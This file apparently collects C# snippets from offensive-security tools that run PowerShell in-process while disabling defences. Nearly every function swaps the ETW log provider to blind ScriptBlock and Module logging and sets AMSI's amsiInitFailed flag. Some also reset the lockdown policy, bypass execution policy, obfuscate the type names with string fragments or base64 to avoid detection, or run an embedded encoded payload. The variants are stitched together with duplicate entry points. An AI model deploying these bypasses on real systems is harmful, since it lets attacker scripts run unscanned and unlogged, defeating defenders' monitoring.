public static string UnPosh(string[] command)
{
    //https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
    //https://twitter.com/mattifestation/status/735261176745988096?lang=en
    //
    // Runs command[1..] as a script in an in-process PowerShell runspace, pipes it
    // through Out-String and returns the trimmed text. Before invoking, it writes two
    // private statics of System.Management.Automation via reflection (the engine's ETW
    // log provider and the AMSI init flag) - the same two steps the plaintext variants
    // in this file perform. Type and field names are assembled from string fragments,
    // presumably to avoid plain string matching on the binary; the plaintext variants
    // show the full names.
    //
    // NOTE(review): pInst is never disposed; the other variants wrap PowerShell in a
    // using block.
    PowerShell pInst = PowerShell.Create();

    // Resolves the engine's PSEtwLogProvider type (name built from fragments).
    var pELP = pInst.GetType().Assembly.GetType("Sys" + "tem." + "Mana" + "geme" + "nt.Aut" + "oma" + "tio" + "n.Tr" + "aci" + "ng.P" + "SE" + "twL" + "og" + "Pr" + "ovi" + "d" + "er");
    if (pELP != null)
    {
        // Private static field "etwProvider" holding the provider the engine logs through.
        var eP = pELP.GetField("e" + "tw" + "Pr" + "ov" + "id" + "er", BindingFlags.NonPublic | BindingFlags.Static);
        // Replace it with a provider registered under a random GUID; the engine's
        // ScriptBlock/Module logging events then (presumably) go to that unregistered
        // provider instead of the PowerShell ETW channel. Transcription is not affected
        // (see the PowerShellExecute remarks in this file). Only this process is changed.
        var eTP = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
        eP.SetValue(null, eTP);
    }

    // bA is never set to false, so the AMSI step always runs when the type resolves.
    bool bA = true;
    // Resolves the engine's AmsiUtils type (name built from fragments).
    var aU = pInst.GetType().Assembly.GetType("S" + "ys" + "te" + "m.M" + "an" + "ag" + "em" + "ent" + ".A" + "ut" + "om" + "at" + "i" + "o" + "n.A" + "ms" + "i" + "U" + "ti" + "l" + "s");
    if (aU != null && bA == true)
    {
        // Sets the private static "amsiInitFailed" flag (the AMSI bypass described in the
        // PowerShellExecute docs in this file). Not null-checked: a missing field throws.
        aU.GetField("a" + "m" + "s" + "iI" + "n" + "i" + "tF" + "ai" + "l" + "ed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
    }

    // command[0] is skipped (presumably the verb that selected this function); the
    // remaining tokens are re-joined with single spaces (leading space included).
    string readCommand = "";
    for (int i = 1; i < command.Length; i++)
    {
        readCommand = readCommand + " " + command[i];
    }
    pInst.Commands.AddScript(readCommand);
    // "Out-String": renders the pipeline output as text.
    pInst.Commands.AddCommand("Ou" + "t-" + "S" + "tr" + "ing");
    StringBuilder stringBuilder = new StringBuilder();
    try
    {
        Collection<PSObject> results = pInst.Invoke();
        foreach (PSObject obj in results)
        {
            stringBuilder.Append(obj);
        }
    }
    catch
    {
        // Catch-all: the exception itself is dropped; only the runspace's recorded
        // failure reason is reported to the caller.
        stringBuilder.Append(string.Format("Error {0}", pInst.InvocationStateInfo.Reason));
    }
    return (stringBuilder.ToString().Trim());
}
public static void Main(string[] args)
{
    // Script to run: loads System.Windows.Forms and shows a message box from PowerShell.
    string Command = @"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Hello from PowerShell!');";
    using (PowerShell PowerShellInstance = PowerShell.Create())
    {
        // Replace the engine's private static ETW provider (PSEtwLogProvider.etwProvider)
        // with one registered under a random GUID before the script runs; the engine's
        // ScriptBlock/Module logging events are then (presumably) no longer written to
        // the PowerShell ETW channel. The type lookup is null-checked; the GetField
        // result is not.
        var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
        if (PSEtwLogProvider != null)
        {
            var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
            var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
            EtwProvider.SetValue(null, EventProvider);
        }
        // No AMSI step in this variant; compare InvokePS / PowerShellExecute in this file.
        PowerShellInstance.AddScript(Command);
        PowerShellInstance.Invoke();
    }
}
// Following a discussion with cobbr over the implementation this was a much more elegant solution :)
// Almost directly ripped from https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Execution/Shell.cs#L37-L55
// Credits to Ryan Cobb
/// <summary>
/// Unpacks a PowerShell script via <c>Archiver.ArchiveHelper</c>, appends <paramref name="arguments"/>
/// on a new line, executes it in-process using System.Management.Automation.dll and writes the joined
/// output to <paramref name="outfile"/>. Optionally bypasses AMSI, ScriptBlock Logging and Module
/// Logging (but not Transcription Logging).
/// </summary>
/// <param name="encpath">Path handed to <c>Archiver.ArchiveHelper</c> (presumably the encrypted archive; see that helper).</param>
/// <param name="encpass">Password handed to <c>Archiver.ArchiveHelper</c>.</param>
/// <param name="outfile">File the output is written to with <c>File.WriteAllText</c> (existing content is replaced).</param>
/// <param name="scriptname">Name handed to <c>Archiver.ArchiveHelper</c> (presumably the entry holding the UTF-8 script).</param>
/// <param name="arguments">Text appended to the decoded script after a newline.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// NOTE(review): the decoded script is shown in a MessageBox before it runs (debug leftover?), and the
/// null/empty check after it is unreachable because "\n" + arguments has already been appended.
/// </remarks>
public void RunPowerShell(string encpath, string encpass, string outfile, string scriptname, string arguments, bool BypassLogging = true, bool BypassAmsi = true)
{
    // Archiver is a project type; ArchiveHelper returns the raw script bytes.
    Archiver archiver = new Archiver();
    byte[] unpacked = archiver.ArchiveHelper(encpath, encpass, scriptname);
    string PowerShellCode = System.Text.Encoding.UTF8.GetString(unpacked);
    PowerShellCode += "\n" + arguments;
    // Displays the full script text in a modal dialog before execution.
    System.Windows.Forms.MessageBox.Show(PowerShellCode);
    // Always false at this point (see remarks above).
    if (PowerShellCode == null || PowerShellCode == "")
    {
        return;
    }
    using (PowerShell ps = PowerShell.Create())
    {
        BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
        if (BypassLogging)
        {
            // Replace the engine's private static ETW provider with one registered under a
            // random GUID so ScriptBlock/Module logging events (presumably) never reach the
            // PowerShell ETW channel. Only this process's engine state is affected.
            var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (PSEtwLogProvider != null)
            {
                var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                EtwProvider.SetValue(null, EventProvider);
            }
        }
        if (BypassAmsi)
        {
            // Marks AMSI initialisation as failed in this process's engine.
            var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            if (amsiUtils != null)
            {
                amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
            }
        }
        ps.AddScript(PowerShellCode);
        var results = ps.Invoke();
        // One line per output object; no Out-String step in this variant.
        string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
        ps.Commands.Clear();
        System.IO.File.WriteAllText(outfile, output);
    }
}
/// <summary>
/// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
/// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
/// </summary>
/// <param name="PowerShellCode">PowerShell code to execute.</param>
/// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <returns>Output of executed PowerShell, one line per result object; "" for null/empty input.</returns>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// Both bypasses are writes to private static fields of the engine loaded in this process; nothing
/// outside the process is changed, and Transcription (as stated above) is not affected.
/// </remarks>
public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
{
    if (PowerShellCode == null || PowerShellCode == "")
    {
        return ("");
    }
    using (PowerShell ps = PowerShell.Create())
    {
        BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
        if (BypassLogging)
        {
            // Swap PSEtwLogProvider.etwProvider for a provider registered under a random
            // GUID before anything is invoked. Type lookup is null-checked; GetField is not.
            var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (PSEtwLogProvider != null)
            {
                var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                EtwProvider.SetValue(null, EventProvider);
            }
        }
        if (BypassAmsi)
        {
            // Set AmsiUtils.amsiInitFailed = true. Type lookup is null-checked; GetField is not.
            var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            if (amsiUtils != null)
            {
                amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
            }
        }
        ps.AddScript(PowerShellCode);
        if (OutString)
        {
            // Renders objects as text so the joined output reads like console output.
            ps.AddCommand("Out-String");
        }
        var results = ps.Invoke();
        string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
        ps.Commands.Clear();
        return (output);
    }
}
public static string InvokePS(string command)
{
    // I had to implement a custom PSHost in order to get Write-Host to work.
    // This wouldn't be an issue if all PowerShell scripts used Write-Output
    // instead of Write-Host, but enough use Write-Host that it's worth it
    // to implement a custom PSHost
    //
    // Runs `command` in a fresh runspace bound to CustomPSHost (a project type) and
    // returns whatever the host UI captured, so Write-Host text is included. The error
    // stream is merged into output. Unlike the other variants in this file, none of the
    // reflection lookups below are null-checked: a runtime whose private type or field
    // names differ would throw NullReferenceException here.
    CustomPSHost host = new CustomPSHost();
    var state = InitialSessionState.CreateDefault();
    state.AuthorizationManager = null; // Bypass PowerShell execution policy
    using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
    {
        runspace.Open();
        using (Pipeline pipeline = runspace.CreatePipeline())
        {
            BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
            // pipeline.Commands is a System.Management.Automation type, so its assembly
            // is the engine assembly whose private types are looked up below.
            var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            // Replace the engine's static ETW provider with one under a random GUID
            // (ScriptBlock/Module logging bypass; transcription is unaffected).
            var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
            var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
            EtwProvider.SetValue(null, EventProvider);
            // Set AmsiUtils.amsiInitFailed = true (AMSI bypass; see PowerShellExecute docs in this file).
            var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
            pipeline.Commands.AddScript(command);
            // Route the script's error stream into its output stream so errors reach the host.
            pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
            // out-default hands results to the host for rendering, which is what gets captured.
            pipeline.Commands.Add("out-default");
            pipeline.Invoke();
        }
    }
    // The custom host UI's accumulated text is the function's result.
    string output = ((CustomPSHostUserInterface)host.UI).Output;
    return (output);
}
public static void InvokePS(string Command, bool BypassAmsi)
{
    // Runs `Command` in an in-process PowerShell instance. Pipeline output is discarded;
    // any exception is printed to the console instead of propagating to the caller.
    try
    {
        using (PowerShell PowerShellInstance = PowerShell.Create())
        {
            // Disable ScriptBlockLogging
            //
            // In PowerShell:
            // $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static');
            // $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
            // $EtwProvider.SetValue($null, $EventProvider);
            //
            // The C# below does the same: the engine's private static ETW provider is
            // replaced with one registered under a random GUID. This step has no switch
            // and runs whenever the type resolves; the GetField result is not null-checked.
            var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (PSEtwLogProvider != null)
            {
                var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                EtwProvider.SetValue(null, EventProvider);
            }
            // Disable AMSI
            // In PowerShell: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
            //
            // Applied only when BypassAmsi is true.
            var AmsiUtils = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            if (AmsiUtils != null && BypassAmsi == true)
            {
                AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
            }
            PowerShellInstance.AddScript(Command);
            PowerShellInstance.Invoke();
        }
    }
    catch (Exception e)
    {
        // NOTE(review): "ERRROR" is a typo in the message literal (runtime string, left as-is).
        Console.WriteLine("ERRROR: " + e.Message);
    }
}
static void Main(string[] args)
{
    // Entry point: prepares an in-process PowerShell engine (ETW provider swap plus
    // lockdown policy reset), runs a trivial Start-Sleep script, then hands the process
    // over to an interactive console host (UnmanagedPSEntry) with the original args.
    try
    {
        // Throwaway script; its only visible effect is a one second pause.
        string Command = @"Start-Sleep 1";
        using (PowerShell powerShellInstance = PowerShell.Create())
        {
            // Replace PSEtwLogProvider.etwProvider with a provider under a random GUID
            // (ScriptBlock/Module logging bypass; see the PowerShellExecute docs in this file).
            var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (psEtwLogProvider != null)
            {
                var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                etwProvider.SetValue(null, eventProvider);
            }
            // Overwrite the engine's cached SystemPolicy.systemLockdownPolicy with None,
            // presumably so no lockdown (language-mode) restriction applies to sessions
            // created afterwards — TODO confirm against the SMA version in use. Not null-checked.
            var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
            fi.SetValue(null, SystemEnforcementMode.None);
            powerShellInstance.AddScript(Command);
            powerShellInstance.Invoke();
        }
        // Console setup; AllocConsole/SetConsoleTitle/SetIcon are defined elsewhere in the
        // project. The title is set to "Windows PowerShell" although this process is not
        // powershell.exe.
        AllocConsole();
        SetConsoleTitle("Windows PowerShell");
        SetIcon();
        // Presumably the console host entry point (Microsoft.PowerShell.UnmanagedPSEntry);
        // Start blocks until the session ends, then the process exits with code 0.
        var ps = new UnmanagedPSEntry();
        ps.Start(null, args);
        Environment.Exit(0);
    }
    catch (Exception ex)
    {
        // Any failure is surfaced in a dialog rather than on the console.
        MessageBox.Show(ex.Message);
    }
}
static void Main(string[] args)
{
    // Entry point: decodes an embedded base64 / UTF-16LE script (the literal is redacted
    // in this copy of the file), swaps the engine's ETW provider, sets the AMSI init-failed
    // flag and the lockdown policy via reflection, then runs the script in-process.
    string Payload = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("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"));
    using (PowerShell powerShellInstance = PowerShell.Create())
    {
        // ETW provider swap (type lookup null-checked; GetField result is not).
        var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
        if (psEtwLogProvider != null)
        {
            var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
            var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
            etwProvider.SetValue(null, eventProvider);
        }
        // AmsiUtils.amsiInitFailed = true. Unlike the block above, neither lookup is
        // null-checked, so a runtime with different private names throws here.
        var amsi = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
        var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
        amsifield.SetValue(null, true);
        // SystemPolicy.systemLockdownPolicy = None (see the other Main in this file for notes).
        var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
        fi.SetValue(null, SystemEnforcementMode.None);
        // Output is discarded.
        powerShellInstance.AddScript(Payload).Invoke();
    }
}
/// <summary>
/// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
/// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
/// </summary>
/// <param name="PowerShellCode">PowerShell code to execute.</param>
/// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <returns>Output of executed PowerShell, interleaved with error, verbose, debug and warning
/// records as they arrive; "" for null/empty input.</returns>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// </remarks>
public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
{
    if (string.IsNullOrEmpty(PowerShellCode))
    {
        return ("");
    }
    using (PowerShell ps = PowerShell.Create())
    {
        BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
        if (BypassLogging)
        {
            // Swap PSEtwLogProvider.etwProvider for a provider registered under a random
            // GUID before anything is invoked. Type lookup is null-checked; GetField is not.
            var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
            if (PSEtwLogProvider != null)
            {
                var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                EtwProvider.SetValue(null, EventProvider);
            }
        }
        if (BypassAmsi)
        {
            // Set AmsiUtils.amsiInitFailed = true. Type lookup is null-checked; GetField is not.
            var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
            if (amsiUtils != null)
            {
                amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
            }
        }
        ps.AddScript(PowerShellCode);
        if (OutString)
        {
            ps.AddCommand("Out-String");
        }
        // Single collection that receives pipeline output (via Invoke below) plus the
        // non-output stream records copied in by the handlers, in arrival order.
        PSDataCollection<object> results = new PSDataCollection<object>();
        ps.Streams.Error.DataAdded += (sender, e) =>
        {
            // NOTE(review): writes a bare "Error" marker to the console on every error
            // record (debug leftover?), then drains the stream into results.
            Console.WriteLine("Error");
            foreach (ErrorRecord er in ps.Streams.Error.ReadAll())
            {
                results.Add(er);
            }
        };
        ps.Streams.Verbose.DataAdded += (sender, e) =>
        {
            // ReadAll removes the records it returns, so each is added once.
            foreach (VerboseRecord vr in ps.Streams.Verbose.ReadAll())
            {
                results.Add(vr);
            }
        };
        ps.Streams.Debug.DataAdded += (sender, e) =>
        {
            foreach (DebugRecord dr in ps.Streams.Debug.ReadAll())
            {
                results.Add(dr);
            }
        };
        ps.Streams.Warning.DataAdded += (sender, e) =>
        {
            // NOTE(review): unlike the other handlers this enumerates the collection
            // instead of ReadAll(), so records stay in the stream and every earlier
            // warning is likely re-added each time a new one arrives.
            foreach (WarningRecord wr in ps.Streams.Warning)
            {
                results.Add(wr);
            }
        };
        // No pipeline input; output objects land in results alongside the stream records.
        ps.Invoke(null, results);
        string output = string.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
        ps.Commands.Clear();
        return (output);
    }
}
private void InitProvider(string providerId)
{
    // Parses the textual provider id and attaches an ETW event provider for it to this
    // instance; an unparsable id throws FormatException before any provider is created.
    this.m_provider = new System.Diagnostics.Eventing.EventProvider(new Guid(providerId));
}
private void InitProvider(string providerId)
{
    // Build the provider GUID from its string form first (FormatException on bad input),
    // then register the ETW provider and keep it on this instance.
    var parsedId = new Guid(providerId);
    var provider = new System.Diagnostics.Eventing.EventProvider(parsedId);
    this.m_provider = provider;
}
static void Main(string[] args)
{
    // Entry point for a small PowerShell-hosting CLI ("npl.exe" in the usage text).
    // Modes, chosen by args[0] (case-insensitive): -encode / -decode convert text to and
    // from base64 UTF-16LE, -shell runs an interactive prompt, -encodedcommand / -enc run
    // base64 UTF-16LE script(s), anything else is run as a script verbatim. Before any of
    // that, the engine's ETW provider and AMSI flag are changed via reflection.
    // TabableReadLine and Invoke are defined elsewhere in the project.
    // NOTE(review): ps is never disposed.
    PowerShell ps = PowerShell.Create();
    // Disable Logging
    // Replace PSEtwLogProvider.etwProvider with a provider registered under a random GUID
    // (ScriptBlock/Module logging bypass; see PowerShellExecute docs in this file).
    var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
    if (PSEtwLogProvider != null)
    {
        var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
        var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
        EtwProvider.SetValue(null, EventProvider);
    }
    // Disable AMSI
    // AmsiUtils.amsiInitFailed = true (type lookup null-checked; GetField is not).
    var AmsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
    if (AmsiUtils != null)
    {
        AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
    }
    if (args.Length >= 1)
    {
        // ToLower() is culture-sensitive; the comparisons assume an ASCII switch name.
        if (args[0].ToLower() == "-encode")
        {
            if (args.Length == 2)
            {
                // Text -> base64 of its UTF-16LE bytes.
                Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
                Console.WriteLine(System.Convert.ToBase64String(bytes));
            }
            else
            {
                Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
            }
        }
        else if (args[0].ToLower() == "-decode")
        {
            if (args.Length == 2)
            {
                // Reverse of -encode; prints the decoded text.
                String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
                Console.WriteLine(cmd);
            }
            else
            {
                Console.WriteLine("usage: npl.exe -decode {base_64_string}");
            }
        }
        else if (args[0].ToLower() == "-shell")
        {
            // Interactive loop: prompt shows the current location, each non-empty line is
            // recorded in history and run; "exit" leaves the loop.
            List<string> history = new List<string>();
            while (true)
            {
                // Current location from the engine; [0] assumes pwd returned at least one object.
                ps.AddScript("pwd");
                string pwd = ps.Invoke()[0].ToString();
                string prompt = "PS " + pwd + "> ";
                string input = TabableReadLine(ps, prompt, pwd, history);
                if (string.IsNullOrEmpty(input))
                {
                    continue;
                }
                if (input.ToLower() == "exit")
                {
                    break;
                }
                history.Add(input);
                Invoke(ps, input);
                // Drop the queued "pwd" and the user's command before the next iteration.
                ps.Commands.Clear();
            }
        }
        else
        {
            if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
            {
                // Each remaining arg is decoded from base64 UTF-16LE and concatenated.
                String script = "";
                for (int argidx = 1; argidx < args.Length; argidx++)
                {
                    script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
                }
                Invoke(ps, script);
            }
            else
            {
                // All args (including args[0]) concatenated with no separator.
                // `@args` is just the verbatim-identifier spelling of `args`.
                String script = "";
                for (int argidx = 0; argidx < args.Length; argidx++)
                {
                    script += @args[argidx];
                }
                Invoke(ps, script);
            }
        }
    }
    else
    {
        Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
    }
}
static void Main(string[] args)
{
    // Same CLI as the plaintext variant of this program elsewhere in this file
    // (-encode / -decode / -shell / -encodedcommand / -enc / verbatim script), except
    // that the reflected type and field names are decoded at runtime from base64
    // UTF-16LE literals rather than written out, presumably to keep them out of plain
    // string scans of the binary. TabableReadLine and Invoke are project methods.
    // NOTE(review): ps is never disposed.
    PowerShell ps = PowerShell.Create();
    // Disable Logging
    // myType decodes to "System.Management.Automation.Tracing.PSEtwLogProvider",
    // myField to "etwProvider" (compare the plaintext variant).
    String myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByAA=="));
    String myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("ZQB0AHcAUAByAG8AdgBpAGQAZQByAA=="));
    var x = ps.GetType().Assembly.GetType(myType);
    if (x != null)
    {
        // Replace the engine's static ETW provider with one under a random GUID
        // (ScriptBlock/Module logging bypass; see PowerShellExecute docs in this file).
        var y = x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static);
        var z = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
        y.SetValue(null, z);
    }
    // Disable AMSI
    // myType now decodes to "System.Management.Automation.AmsiUtils", myField to "amsiInitFailed".
    myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA=="));
    myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=="));
    x = ps.GetType().Assembly.GetType(myType);
    if (x != null)
    {
        x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
    }
    if (args.Length >= 1)
    {
        // ToLower() is culture-sensitive; the comparisons assume an ASCII switch name.
        if (args[0].ToLower() == "-encode")
        {
            if (args.Length == 2)
            {
                // Text -> base64 of its UTF-16LE bytes.
                Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
                Console.WriteLine(System.Convert.ToBase64String(bytes));
            }
            else
            {
                Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
            }
        }
        else if (args[0].ToLower() == "-decode")
        {
            if (args.Length == 2)
            {
                // Reverse of -encode; prints the decoded text.
                String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
                Console.WriteLine(cmd);
            }
            else
            {
                Console.WriteLine("usage: npl.exe -decode {base_64_string}");
            }
        }
        else if (args[0].ToLower() == "-shell")
        {
            // Interactive loop: prompt shows the current location, each non-empty line is
            // recorded in history and run; "exit" leaves the loop.
            List<string> history = new List<string>();
            while (true)
            {
                // Current location from the engine; [0] assumes pwd returned at least one object.
                ps.AddScript("pwd");
                string pwd = ps.Invoke()[0].ToString();
                string prompt = "PS " + pwd + "> ";
                string input = TabableReadLine(ps, prompt, pwd, history);
                if (string.IsNullOrEmpty(input))
                {
                    continue;
                }
                if (input.ToLower() == "exit")
                {
                    break;
                }
                history.Add(input);
                Invoke(ps, input);
                // Drop the queued "pwd" and the user's command before the next iteration.
                ps.Commands.Clear();
            }
        }
        else
        {
            if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
            {
                // Each remaining arg is decoded from base64 UTF-16LE and concatenated.
                String script = "";
                for (int argidx = 1; argidx < args.Length; argidx++)
                {
                    script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
                }
                Invoke(ps, script);
            }
            else
            {
                // All args (including args[0]) concatenated with no separator.
                // `@args` is just the verbatim-identifier spelling of `args`.
                String script = "";
                for (int argidx = 0; argidx < args.Length; argidx++)
                {
                    script += @args[argidx];
                }
                Invoke(ps, script);
            }
        }
    }
    else
    {
        Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
    }
}